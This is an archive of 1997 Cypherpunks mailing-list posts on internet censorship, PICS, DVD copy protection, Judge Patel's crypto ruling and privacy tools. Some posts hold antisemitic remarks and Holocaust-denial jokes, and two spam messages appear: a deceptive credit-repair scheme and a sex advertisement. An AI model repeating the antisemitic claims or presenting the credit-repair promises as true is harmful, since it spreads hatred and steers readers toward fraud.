(3umoelle at informatik.uni-hamburg.de) passed this wisdom: >... to implement a >management regime consistent with provisions for protection of society these are the words that scare the shit out of me ... so innocuous, so high moral sounding, no one can argue with that as the justification to do just about anything ... but just look at our (we humans) track record with regards to that argument ... shudder! >... Implementation on this basis would >be necessary to ensure subscribers could not tamper with management >settings. .... fat chance ... the only good thing about such a system is its appeal to my childish love to go after anything someone says is 'unbreakable!' -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBNAeUccdZgC62U/gIEQIEyACfXEDDmFUUKZdP3a/EZM6QZ1EFZtgAoKRN f2b0LIvTOII4CBAJt3RkYhzi =yUII -----END PGP SIGNATURE----- Brian B. Riley --> http://www.macconnect.com/~brianbr For PGP Keys - Send Email Subject "Get PGP Key" "One of the deep mysteries to me is our logo, the symbol of lust and knowledge, bitten into, all crossed with in the colors of the rainbow in the wrong order. You couldn't dream of a more appropriate logo: lust, knowledge, hope, and anarchy." -- Gassee - Apple Logo From enoch at zipcon.net Fri Aug 29 20:57:25 1997 From: enoch at zipcon.net (Mike Duvos) Date: Sat, 30 Aug 1997 11:57:25 +0800 Subject: Fate of Jews in America (fwd) In-Reply-To: <19970830034359.3947.qmail@zipcon.net> Message-ID: <19970830034714.4119.qmail@zipcon.net> Igor forwarded: > THE WASHINGTON TIMES > August 29, 1997 The Moonies? I believe it was Gore Vidal who commented upon the curious incest between religious and political right wing extremists and the Jews. In return for the incorporation of the tenets of Zionism into extremist religious philosophy, and a few billion dollars of aid each year, Jewish intellectuals pretend there is nothing wrong with obvious nonsense, when in fact they know better. > The danger for Jews, oddly, is that in the > foreseeable future they might be so well assimilated they become > extinct. Extinction is a species concept. Human beings, not human beings of Jewish extraction or belief, are the species here. Therefore Jews cannot become "extinct," any more than people who like pretzels can become "extinct." Certain memes passed down by self-identified practitioners of the Jewish faith may become extinct, but that is another issue entirely. > .... . . . But the question isn't what other Americans would think of this > kind of double allegiance, or whether the two allegiances might some day > be in conflict, It isn't? What about the traitor Pollard, who has a fat pension and a comfortable lifestyle waiting for him in the Zionist entity, should the US government ever be so foolish as to let him out of prison. How many more Pollards has Zionist propaganda produced, who would do anything the Zionist entity commanded, to further its cause? Why do we continue to pour money into a self-declared country whose hidden agenda is to steal more of its neighbors' land, whose ideological orientation is blatantly racist, whose Supreme Court has ruled that torture is a legitimate means of interrogation, and which used to sing the praises of pre-democratic South Africa as the kind of society it wished to emulate? What was it Jim Baker said? -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From brianbr at together.net Fri Aug 29 21:01:02 1997 From: brianbr at together.net (Brian B. Riley) Date: Sat, 30 Aug 1997 12:01:02 +0800 Subject: need confirmation of DVD/CSS crack in China ... Message-ID: <199708300354.XAA19505@mx02.together.net> On 8/29/97 1:44 AM, Lucky Green (shamrock at netcom.com) passed this wisdom: >I fail to see how you can prevent copying an entire disk. If the controller >can access the data, I can copy it. Unless of course it will be made >illegal to sell DVD controllers that output the raw data stream. > >Come to think of it, that must be coming. 'security through obscurity' has/will never work. All it takes is one good reverse engineer and presto, the secret is out and 'unlocked' controller will be available above or under ground! The process could be slowed down by keeping the price of DVD writers high, but we saw how long that worked for both DAT and CD-R. Hell CD-Rs are now available for less than CD readers were three years ago. Brian B. Riley --> http://www.macconnect.com/~brianbr For PGP Keys - Send Email Subject "Get PGP Key" "The first 75% of the project takes 90% of the time; the last 15% of the project takes the other 90% of the time. -- Barry Wainwright and numerous ofthe engineers From brianbr at together.net Fri Aug 29 21:13:58 1997 From: brianbr at together.net (Brian B. Riley) Date: Sat, 30 Aug 1997 12:13:58 +0800 Subject: Shrinks as Narcs for the State Message-ID: <199708300404.AAA31538@mx01.together.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 8/29/97 2:26 AM, Tim May (tcmay at got.net) passed this wisdom: >Further, those who visit doctors and shrinks are at risk for other reasons. >The State has decreed that they "narc out" (inform on) their patients. Cf. >Tarasoff, for example, which requires a mental health care professional, >counselor, or doctor to inform the State if a client makes certain kinds of >threats. This threat may cause the client to be locked up for observation. I have a close friend who is a therapist on several occasions had the state and insurance companies try to force disclosure of materials on certain patients. It has created such a dilemma that this person had consulted with me to come up with not just encryption solutions but steganographic solutions as well so that if this person's computer is subpoenaed (sp?) they won't know what to look at/for. At the time, I though the person was over-reacting, but in the ensuing eighteen months, I am not so sure. -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBNAeb2sdZgC62U/gIEQKidwCfdXjHOm/hwkkk2aSaG/Y6/dwwC3UAoLNG lscH2PKWudPOTKM8ifo1JJUQ =tu6w -----END PGP SIGNATURE----- Brian B. Riley --> http://www.macconnect.com/~brianbr For PGP Keys - Send Email Subject "Get PGP Key" "It would take an archimedean fulcrum to raise you to the level of total depravity" --Thomas E. Carney, ca. 1920 From mailhost at aol.com Sat Aug 30 13:30:31 1997 From: mailhost at aol.com (mailhost at aol.com) Date: Sat, 30 Aug 1997 13:30:31 -0700 (PDT) Subject: Your Credit Report Message-ID: <32009586374.JJX09264@577488fixcredit.com>


\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
    *AS SEEN ON TV * AS SEEN ON TV * AS SEEN ON TV* AS SEEN ON TV*
//////////////////////////////////////////////////////////////////////

If you received this electronic mailing by mistake, please pardon our intrusion.

Dear Friend,

Are you or somebody that you know experiencing credit problems?  If your answer is yes, I think you will be very interested in our special offer. No longer will you have to live like a second class citizen due to a bad credit report. Bad credit is caused by a variety of reasons:  Health, divorce, termination of employment, loss of income and dozens of other reasons. The bottom line is that bad credit can happen to anybody.  There is no specific profile of a person with credit problems. It can happen to doctors, lawyers, accountants, the mail man, truck drivers, housekeepers and salesmen. As a matter of fact, one in three Americans live with some form of bad credit. Fortunately, the United States Government has passed many laws under the Fair Credit Reporting Act, all of which protect your rights as a consumer. Our manuals will show you how to use these Federal laws to your advantage and repair or obtain a new credit report.

            ***** THE FRESH START PROGRAM (TM) *****

Have you seen your credit bureau report lately?  Have you recently been denied credit because of a bad cedit report? If you have answered yes, then you need to take advantage of THE FRESH START PROGRAM (TM). THE FRESH START PROGRAM (TM) will guide you through the process of obtaining a BRAND NEW credit bureau report. Our easy-to-follow manual will put you on the fast track to obtaining your new credit bureau report and can be accomplished within 24 hours! Regardless of your credit rating, you can NOW obtain a brand new, fresh credit bureau report free of:

		*  ANY bad credit
		*  Bankruptcies
		*  Judgements
		*  Foreclosures
		*  Charge-Off's
		*  Tax Lien's
		*  Repossessions
		*  Late pays
		*  Garnishments
		*  Inquiries

NOW, you can have a 'Clean Slate' and a 'FRESH START' with a brand new, credit bureau report.

//////////////////////////////////////////////////////////////////////

            ***** THE COMPLETE CREDIT REPAIR KIT (TM) *****

Good credit empowers you to qualify for personal loans, business loans, auto loans, credit cards, home loans and other types of credit you may apply for, at the best possible interest rate. As you know, if you don't have excellent credit, lenders will NEVER extend credit to you! The Fair Credit Reporting Act will allow you to legally and permanently ERASE the negative information on your credit bureau file. Anything that is damaging to your credit rating, may be removed:
Inquiries, Foreclosures, Repossessions, Charge-Off's, Late Payments
Student Loans, Bankruptcies and Judgements

The 'Credit Repair' companies located in every city will charge from $500.00 and up to do what our easy-to-follow manual will teach you. Now, in the privacy of your own home, you can repair your own credit at your own pace.

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

                        ***** PROOF *****

"Having bad credit was the one thing holding me back from starting my own business. After working your program, I qualified for a $45,000 Small Business Loan. My business is making me more money than I've ever made.  Your program is truly priceless!"
					George S.  -  Fresno, CA.

"Thank you, thank you, thank you!  Before, my credit was totally trashed. After using your Fresh Start Program and using The Complete Credit Repair Kit, my wife and I qualified to purchase our first home with no down payment. These programs are worth thousands of dollars!"
					Kenneth T.  -  Ithica, NY

"After being laid off, my creditors were not very understanding when I couldn't pay my bills and as a result, my credit was very badly damaged.  Once I started working again, I couldn't qualify for any type of credit. After using the manuals, I qualified to buy a new car, with no down payment."
					Mr. Fred C.  -  Tampa, FL

"After my divorce, I was forced to file bankruptcy.  I was told my credit would be ruined for 10 years. After using the your manuals, I have great credit again.  I even receive pre-approved credit cards in the mail. Thank you so much for your amazing program.  I don't know what I could have done without it. I highly recommend your program to anyone who has credit problems."
					Ms. Anna S.  -  Tacoma, WA

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
YOU MAY BE ABLE TO EARN $1,500.00 FOR YOUR TESTIMONIAL ON OUR UPCOMING TV INFOMERCIAL.
DETAILS INCLUDED WITH YOUR ORDER.
//////////////////////////////////////////////////////////////////////

Don't let ANYONE tell you that you can not make the transition from a bad credit risk to that of preferred credit customer. Over 175,000 satisfied customers can't be wrong!  each manual, THE FRESH START PROGRAM (TM) and THE COMPLETE CREDIT REPAIR KIT (TM) is normally $89.95 + $3.95 S&H. However, if you take advantage of this special offer within the NEXT 24 HOURS, you will pay only $34.95 + $3.95 S+H for one program or you can take both programs for $54.95 +$3.95 S&H (U.S. Funds Only).  

To place your order, simply mail the form below, along with your certified check, money order, personal check or cash to:

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
I.M.S.
5201 Kingston Pike, Suite 6-216
Knoxville, Tennessee 37919

Yes, please send the manual(s) checked below:

$34.95     THE FRESH START PROGRAM (TM)

$34.95     THE COMPLETE CREDIT REPAIR KIT (TM)		

$54.95     Both Programs				
				
$_____     Sub Total
				
$ 4.95     Shipping and handling
$(15.00)   RUSH Delivery (Optional)

$_____     Total Enclosed

I have enclosed (Check One): 
_____Cashiers Check
_____Money Order
_____Personal Check
_____Cash

SHIPPING INFORMATION:

Name:_________________________________________
Phone:_______--__________--___________________

Physical Street Address (NO P.O. BOXES):_______________________________________

City:______________________ 
State:____   Zip/Postal Code:_________________

Your E-Mail Address (Needed for order confirmation):________________________________

///////////////////////////////////////////////////

SAVE AN ADDITIONAL $5.00!!! FAX YOUR ORDER NOW!!!

Please tape your completed check in the space below and fax it along with your order to IMS.

That facsimile number is 1-423-681-6520 

*************************************************

                                               
  FAX: 1-423-681-6520                         
                                               
  Please Tape Your Check Here                  
                                               
  Please Sign Your check                       
                                               
                                               
*************************************************

Thank You For Your Order-All orders shipped same day.

654657808268556









From mix at anon.lcs.mit.edu  Fri Aug 29 22:50:31 1997
From: mix at anon.lcs.mit.edu (lcs Mixmaster Remailer)
Date: Sat, 30 Aug 1997 13:50:31 +0800
Subject: Patel decision pages 7 and 8 handled
Message-ID: <19970830054001.7793.qmail@nym.alias.net>








From tcmay at got.net  Fri Aug 29 23:22:15 1997
From: tcmay at got.net (Tim May)
Date: Sat, 30 Aug 1997 14:22:15 +0800
Subject: Feasibility of censoring and jamming pronography and racismin informatics
In-Reply-To: 
Message-ID: 



At 12:54 PM -0700 8/29/97, Ulf M�ller wrote:
>A European parliament study evaluating `Feasibility of censoring and
>jamming pronography and racism in informatics':
>
>"SUBSCRIBER PROTECTION: In this scenario [...] it would be necessary
>for access providers to use firewall and PICS technology (in some
>instances implemented with in proxy applications) to implement a
>management regime consistent with provisions for protection of society
>as in other media, ie media parity. Implementation on this basis would
...
>	- currently implementations of the key technology
>	  (PICS) in Internet applications is incomplete and
>	  hence the ratings information can not yet be used to
>	  manage all types of Internet content explicitly;


Well, so much for PICS being "voluntary." It seems the Euro-fascists are
already planning to incorporate it as a control mechanism.

(But, then, only fools thought PICS would be a "voluntary" self-ratings
system. It will by the Zyklon-B of the German-French-British information
Holocaust. And the United States will of course also try to implement this.
Only the recent "setbacks" in crypto laws--Bernstein, Denning's cold feet,
Clinton's troubles, Ruby Ridge prosecution, etc.--give me any comfort. )

The rest of what Ulf forwarded shows just how deeply the Europeans have
been infected. It needs to be monkeywrenched.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From stewarts at ix.netcom.com  Fri Aug 29 23:38:04 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 30 Aug 1997 14:38:04 +0800
Subject: Quote of the day (fwd)
Message-ID: <3.0.2.32.19970829232904.02f86e58@popd.ix.netcom.com>



When is X-Day supposed to be?

>----- Forwarded message from Quote of the day -----
>
>"I know the day it happens.  On August 29, 1997 it's going to feel
> pretty fucking real to you too.  Anybody not wearing two million sun
> block is going to have a real bad day.  Get it?"
>
> - Sarah Conner (played by Linda Hamilton), in Terminator 2: Judgement
>   Day, offers a cheery thought for today.  [In the film, an unfortunate
>   computer glitch leads to the near-destruction of the Earth on this
>   day. -ed.]
>
>    Submitted by: "D. Joseph Creighton" 
>                  Aug. 27, 1997
>       --------------------------------------------------------------
>            Send quotation submissions to qotd at ensu.ucalgary.ca
>       Send list changes or requests to qotd-request at ensu.ucalgary.ca
>
>----- End of forwarded message from Quote of the day -----
>
>

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From gnu at toad.com  Fri Aug 29 23:42:24 1997
From: gnu at toad.com (John Gilmore)
Date: Sat, 30 Aug 1997 14:42:24 +0800
Subject: Want to help put Judge Patel's decision on the web?
In-Reply-To: <199708292351.QAA23568@toad.com>
Message-ID: <199708300631.XAA29629@toad.com>



Thanks for the great response, folks!!  So far we have about half the
pages covered.  Here is the ones we don't yet have.  Pick one at
random, if you want to help; see my previous message for details.

Still needed:  7 8  10 11 13 14 15 16 18  20 21 23 28 29  30 31 32 34 35

Thanks again!

	John






From rich at paranoid.org  Fri Aug 29 23:46:07 1997
From: rich at paranoid.org (Rich Burroughs)
Date: Sat, 30 Aug 1997 14:46:07 +0800
Subject: Kevin Mitnick RC5 Crack team - Join Us
Message-ID: 



Have your CPU fight for justice in it's spare time!

Some of the folks from the mitnick at 2600.com mailing list have set up an
RC5 team in hopes of generating awareness about Kevin Mitnick's ordeal and
possibly some cash for his defense.

Details are at our site:

http://www.paranoid.org/mitnick/

The site has more info about Mitnick and the RC5 crack if you're not
familiar, as well as a gallery of graphics & banners you can put on your
own site to show your support.  We hope to have a stats page up soon.

We're registered at both www.distributed.net and www.cyberian.org ...
give us a hand!









From sexeygirltoy at 06137.com  Sat Aug 30 14:56:05 1997
From: sexeygirltoy at 06137.com (sexeygirltoy at 06137.com)
Date: Sat, 30 Aug 1997 14:56:05 -0700 (PDT)
Subject: Live Sex..NO VIDEO DELAY..Like TV!|
Message-ID: 


Live Interactive Video Sex.  FIRST 5 MINUTES FREE

Wouldn't you like to see a Live Girl on
your computer Screen??? Now the girl can see you as well - Featuring Two
way video. This video service is not like others. There is no video
delay, and the screen is crystal clear and big, just like a T.V. You can
also talk to her on a voice line as you are watching her do it all just
for you. Our Live video is so good that we are giving you 5 Free min. to
show you that we are the best.

Hurry up and visit our website at 

http://209.14.198.122/livesex.htm

Me and my friends are waiting for you now and will do anything
you want us to.

Love Savanah,
XOXOXO

P.S. If you have a quick cam don't forget to plug it in. Me and my
friends will love to see you as well!!!!

http://209.14.198.122/livesex.htm






From tcmay at got.net  Sat Aug 30 00:21:12 1997
From: tcmay at got.net (Tim May)
Date: Sat, 30 Aug 1997 15:21:12 +0800
Subject: Fate of Jews in America (fwd)
In-Reply-To: <19970830034359.3947.qmail@zipcon.net>
Message-ID: 



At 8:47 PM -0700 8/29/97, Mike Duvos wrote:

>Extinction is a species concept.  Human beings, not human beings of Jewish
>extraction or belief, are the species here.  Therefore Jews cannot become
>"extinct," any more than people who like pretzels can become "extinct."
>
>Certain memes passed down by self-identified practitioners of the Jewish
>faith may become extinct, but that is another issue entirely.

The only interpretation that makes sense is that certain persons with
"Jewish" blood are worried that their "race" is being polluted by non-Jew
blood. Else why worry that intermarriage (miscegenation) is occurring?

If a Nordic or Germanic or Aryan person were to write the same editorial in
"The Washington Times" about his or her race, it would be laughed off as a
racist paranoid fantasy.


>It isn't?  What about the traitor Pollard, who has a fat pension and a
>comfortable lifestyle waiting for him in the Zionist entity, should the US
>government ever be so foolish as to let him out of prison.
>
>How many more Pollards has Zionist propaganda produced, who would do
>anything the Zionist entity commanded, to further its cause?
>
>Why do we continue to pour money into a self-declared country whose hidden
>agenda is to steal more of its neighbors' land, whose ideological
>orientation is blatantly racist, whose Supreme Court has ruled that
>torture is a legitimate means of interrogation, and which used to sing the
>praises of pre-democratic South Africa as the kind of society it wished to
>emulate?
>
>What was it Jim Baker said?

I don't know, but I certainly agree with your points about the Zionist
Entity. Of course.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From mix at anon.lcs.mit.edu  Sat Aug 30 00:27:27 1997
From: mix at anon.lcs.mit.edu (lcs Mixmaster Remailer)
Date: Sat, 30 Aug 1997 15:27:27 +0800
Subject: Patel decision pages 7 and 8 handled
Message-ID: <19970830072002.1354.qmail@nym.alias.net>








From jaed at best.com  Sat Aug 30 00:37:53 1997
From: jaed at best.com (Jeanne A. E. DeVoto)
Date: Sat, 30 Aug 1997 15:37:53 +0800
Subject: Feasibility of censoring and jamming pronography and racism in informatics
In-Reply-To: 
Message-ID: 



At 11:17 PM -0700 8/29/97, Tim May wrote:
>At 12:54 PM -0700 8/29/97, Ulf M�ller wrote:
>>"SUBSCRIBER PROTECTION: In this scenario [...] it would be necessary
>>for access providers to use firewall and PICS technology (in some
>>instances implemented with in proxy applications)
["protection of society" yadda yadda]
>
>Well, so much for PICS being "voluntary." It seems the Euro-fascists are
>already planning to incorporate it as a control mechanism.
>
>(But, then, only fools thought PICS would be a "voluntary" self-ratings
>system.

You forgot firewalls, Tim. Only fools thought firewalls would be voluntary.

Also, proxy servers. So much for proxy-server technology being "voluntary";
pity the poor fools who claimed it had legitimate applications and should
not be banned because of the probability that it would also be used for
immoral purposes such as censorship.

(Not that I disagree with you about the Europeans, or at least those who
wrote this document. This paragraph was particularly interesting:
"The principal social objection to this policy scenario [i.e. people
deciding for themselves what they want to see and read] is that it does not
in any way act to reduce abuse [by which the authors appear to mean
'publication of content they consider offensive'] either on the Internet or
in the 'real' world."
Seldom does one see so clearly laid out the reasons for opposition to
personal freedom: letting people make their own choices Doesn't Punish
Those with Bad Ideas.)

--
"I'm from the government, and I'm here to help you recover your keys."







From blancw at cnw.com  Sat Aug 30 00:44:18 1997
From: blancw at cnw.com (Blanc)
Date: Sat, 30 Aug 1997 15:44:18 +0800
Subject: Patel Decision Pages 13, 14, 15, 16 On Their Way
Message-ID: <3.0.32.19970830003307.012d27b4@cnw.com>




>Still needed:  7 8  10 11 13 14 15 16 18  20 21 23 28 29  30 31 32 34 35
>
>Thanks again!
>
>	John
...............................
    ..
Blanc






From tcmay at got.net  Sat Aug 30 00:52:29 1997
From: tcmay at got.net (Tim May)
Date: Sat, 30 Aug 1997 15:52:29 +0800
Subject: Quote of the day (fwd)
In-Reply-To: <3.0.2.32.19970829232904.02f86e58@popd.ix.netcom.com>
Message-ID: 



At 11:29 PM -0700 8/29/97, Bill Stewart wrote:
>When is X-Day supposed to be?
>
>>----- Forwarded message from Quote of the day -----
>>
>>"I know the day it happens.  On August 29, 1997 it's going to feel
>> pretty fucking real to you too.  Anybody not wearing two million sun
>> block is going to have a real bad day.  Get it?"
>>
>> - Sarah Conner (played by Linda Hamilton), in Terminator 2: Judgement
>>   Day, offers a cheery thought for today.  [In the film, an unfortunate
>>   computer glitch leads to the near-destruction of the Earth on this
>>   day. -ed.]
>>
>>    Submitted by: "D. Joseph Creighton" 
>>                  Aug. 27, 1997
>>       --------------------------------------------------------------
>>            Send quotation submissions to qotd at ensu.ucalgary.ca
>>       Send list changes or requests to qotd-request at ensu.ucalgary.ca
>>
>>----- End of forwarded message from Quote of the day -----

I don't know what you mean by "When is X-Day supposed to be?"

The quote is self-explanatory. August 29th, 1997, yesterday, was the date
in the quote.

Where is this "X-Day" in the section you quoted?

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From ccaputo at alt.net  Sat Aug 30 02:14:20 1997
From: ccaputo at alt.net (Chris Caputo)
Date: Sat, 30 Aug 1997 17:14:20 +0800
Subject: Want to help put Judge Patel's decision on the web?
In-Reply-To: 
Message-ID: 



Patel decision page 28 handled.

Chris






From ccaputo at alt.net  Sat Aug 30 02:24:09 1997
From: ccaputo at alt.net (Chris Caputo)
Date: Sat, 30 Aug 1997 17:24:09 +0800
Subject: Want to help put Judge Patel's decision on the web?
In-Reply-To: 
Message-ID: 



Patel decision page 29 handled.

Chris






From ccaputo at alt.net  Sat Aug 30 02:29:57 1997
From: ccaputo at alt.net (Chris Caputo)
Date: Sat, 30 Aug 1997 17:29:57 +0800
Subject: Want to help put Judge Patel's decision on the web?
In-Reply-To: 
Message-ID: 



Patel decision page 32 handled.

Chris







From anon at anon.efga.org  Sat Aug 30 02:38:18 1997
From: anon at anon.efga.org (Anonymous)
Date: Sat, 30 Aug 1997 17:38:18 +0800
Subject: None
Message-ID: <5296a79d3830cbedb8a19f5a4b2b4e8a@anon.efga.org>



The metallic custard scent ripped through the 
stegosaurus' nostrils.  Clearly, the monotreme 
journey it would begin as it had ended.

The ponder-tree hung itself in the heavy air, 
it's sap becomming purple, and flowed engimatically 
like a river of broken curves and powdered eggshells.

- A'Tak A'Tdorn






From ccaputo at alt.net  Sat Aug 30 02:42:19 1997
From: ccaputo at alt.net (Chris Caputo)
Date: Sat, 30 Aug 1997 17:42:19 +0800
Subject: Want to help put Judge Patel's decision on the web?
In-Reply-To: 
Message-ID: 



Patel decision page 30 handled.

Chris






From remailer at bureau42.ml.org  Sat Aug 30 02:42:24 1997
From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer)
Date: Sat, 30 Aug 1997 17:42:24 +0800
Subject: No Subject
Message-ID: 



Kent Crispin writes:

> This is an interesting competition for observers, bystanders, and
> citizens.  If the power structure is flexible, and incorporates
> changes that are viewed favorably by the citizens, then the power
> structure "wins".  But so do the citizens.
>
> When change doesn't happen, or especially when it goes in a direction
> undesired by the revolutionaries, but liked by the citizens, the
> effort to make current reality look bad intensifies.

Kent's theory OTOH is that any tyranny is fine as long as 51% of the 
citizens favor it.  The rest of us should pipe down and learn to live
with it.
 
Fortunately the authors of the US constitution didn't agree with this 
theory.


>                                                       When change
> irrevocably passes to an unwanted state, and the revolutionaries
> "lose", a residue of Bitter Old Revolutionary Extremists (BOREs)
> results.  These toothless old tigers, clinging to their youthful
> dreams, rage at a reality that passed them by.  Snarling and
> perpetually misunderstood, they wither and waste away, Cheshire cat
> evil grimace postcripts to history. 

Kent's been studying Youngbonics!  Still a ways to go
before he equals the master though.

Looking forward to the BORE wars...
BORE monger







From blancw at cnw.com  Sat Aug 30 02:44:00 1997
From: blancw at cnw.com (Blanc)
Date: Sat, 30 Aug 1997 17:44:00 +0800
Subject: Patel Decision:  Page 18  handled
Message-ID: <3.0.32.19970830024001.012dc5e4@cnw.com>









From ccaputo at alt.net  Sat Aug 30 02:54:04 1997
From: ccaputo at alt.net (Chris Caputo)
Date: Sat, 30 Aug 1997 17:54:04 +0800
Subject: Want to help put Judge Patel's decision on the web?
In-Reply-To: 
Message-ID: 



Patel decision page 31 handled.

Chris






From anon at anon.efga.org  Sat Aug 30 03:30:24 1997
From: anon at anon.efga.org (Anonymous)
Date: Sat, 30 Aug 1997 18:30:24 +0800
Subject: U.S. Refugees Flee to Germany
Message-ID: <31644ca96a880795cfae11b0067696ff@anon.efga.org>



-----BEGIN PGP SIGNED MESSAGE-----

At 9:46 AM 8/28/1997, Tim May wrote:
>At 8:20 AM -0700 8/28/97, Anonymous wrote:
>>~Now, the pages are back online on a small server in Germany. Organizers
>>of the site are raising funds to purchase their own direct connection to
>>the Net. However they don't want their computer to be in the US-- but
>>not because they plan to violate any US laws. "We are very nervous
>>about being here," says Jim Finn, who helps run the Free Spirits, "if
>>the government is going to use underhanded tactics to intimidate our
>>providers and possibly confiscate our equipment." In the course of
>>investigations, police frequently seize computers that they never
>>return, even when they file no charges.
>>
>>  Perhaps Germany should start building refugee camps for American
>>homosexuals, Jews, and producers of strong encryption.
>...
>
>I assume this is a joke, as Germany is one of the last places one would
>choose for a censorship-free site!

This should be a good candidate for the Eternity service.

They aren't in the search engines yet.  Anybody know how to reach
them?

>But I'll contact Jim Finn about hosting my "The So-Called Holocaust" Web
>page, which explains how the International Jew Conspiracy has succeeded in
>convincing the gullible that Jews were persecuted in the WW II, when all
>right-thinking Aryans know full well that they were coddled and rewarded
>and given choice vacation spots in "the East."

>Free Spirits should be an ideal host for this material.

Another good candidate for the Eternity service.

Monty Cantsin
Editor in Chief
Smile Magazine
http://www.neoism.org/squares/smile_index.html
http://www.neoism.org/squares/cantsin_10.html
"I AM a number!  I am a free man!"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNAZsoJaWtjSmRH/5AQFyjQf+ItcBLLcyIjXme/DKUuyI81UXL9yXmn5S
5uSjpYi+N5sKk7Q1AMkmI8LmgQPRbefJ3zFdgiLQjtzmL0iknhatAYUsy3YHxXOT
UmGTRdcJ8URv0jZF7Q7HibJ2owhvwpH5WnOXV3Vl08f2L+n/FypjqL7mbanJpa/s
2FTAgoAD9iUB28sU3WuDl6towNtIV0S3BTMxBQOZDU+HlpiZmrVHuaogtuXVCpr/
bfsosQXCYYGDU9pBSa+aCLK/aUosBJL1LX1foTAaWLXZEY5gnE28umUgJgebZOJq
MPRgqPqt4qNKHokZZdtdeesDITtiL5WsQnt7migDxg29xG4aokjY0A==
=F+zE
-----END PGP SIGNATURE-----








From harka at nycmetro.com  Sat Aug 30 04:32:11 1997
From: harka at nycmetro.com (harka at nycmetro.com)
Date: Sat, 30 Aug 1997 19:32:11 +0800
Subject: SSL Proxy
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

Apparently the folks at LPWA.COM are checking into the possibility
of encrypting all sessions between the user and the lpwa-http-proxy
(ala SSL) as to prevent line-eavesdropping.

At this point, they're just playing with the idea and are trying to
figure out exactly how to accomplish that. Maybe we could do some
brain-storming and support them with that project...

Ciao

Harka

... "Use a Cipher - Be Free!"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAgUBNAeefTltEBIEF0MBAQE0Awf+JkFyHOvmBbymvvMS1eXUaD3M6LAeX6V1
PLJsh8+jbfQeAffiY7jciypgWw+gURRBW6pYzgTl+Qrv/82LzdZDWXX+88o7w6ql
YCtefWu46j/eC220n7vpO+CqR2tSlyujaf/V4Np1cwx5B8frM2JYrvjh5rXrtXv0
ck8lg7PYwjRqI8pyTyTZz/ypqx8GX4wawXMT3TPnWpjF0LTamDslHhA3HNLEb7G9
y45QGgW042hH91CXG+aXpQJ6HKK8mAyMTintdB0Y0Qpz6hk9z10JvI1pkgdYh6ap
CdCsEcIRZdhG/xLhQ6xL4Ud3x+1ho9OIHbyrhXbrfSFubumLhg4njQ==
=E7oZ
-----END PGP SIGNATURE-----


If encryption is outlawed, only outlaws will have encryption...







From ant at notatla.demon.co.uk  Sat Aug 30 04:34:00 1997
From: ant at notatla.demon.co.uk (Antonomasia)
Date: Sat, 30 Aug 1997 19:34:00 +0800
Subject: Patel decision page 32 handled
Message-ID: <199708300839.JAA01589@notatla.demon.co.uk>




--
##############################################################
# Antonomasia   ant at notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
#### !!! PGP 5.0 beta available now at ftp.replay.com !!! ####






From anon at anon.efga.org  Sat Aug 30 04:36:38 1997
From: anon at anon.efga.org (Anonymous)
Date: Sat, 30 Aug 1997 19:36:38 +0800
Subject: U.S. Refugees Flee to Germany
Message-ID: 



Anonymous wrote:
> This should be a good candidate for the Eternity service.
> 
> They aren't in the search engines yet.  Anybody know how to reach
> them?

These are the people who published the article:
The Guide 

> Monty Cantsin
> Editor in Chief
> Smile Magazine
> http://www.neoism.org/squares/smile_index.html
> http://www.neoism.org/squares/cantsin_10.html
> "I AM a number!  I am a free man!"







From miner333 at dogbert.xroads.com  Sat Aug 30 05:07:56 1997
From: miner333 at dogbert.xroads.com (miner)
Date: Sat, 30 Aug 1997 20:07:56 +0800
Subject: patel pages 34 & 35 done
Message-ID: 








From gav at fownes.demon.co.uk  Sat Aug 30 05:20:10 1997
From: gav at fownes.demon.co.uk (gav at fownes.demon.co.uk)
Date: Sat, 30 Aug 1997 20:20:10 +0800
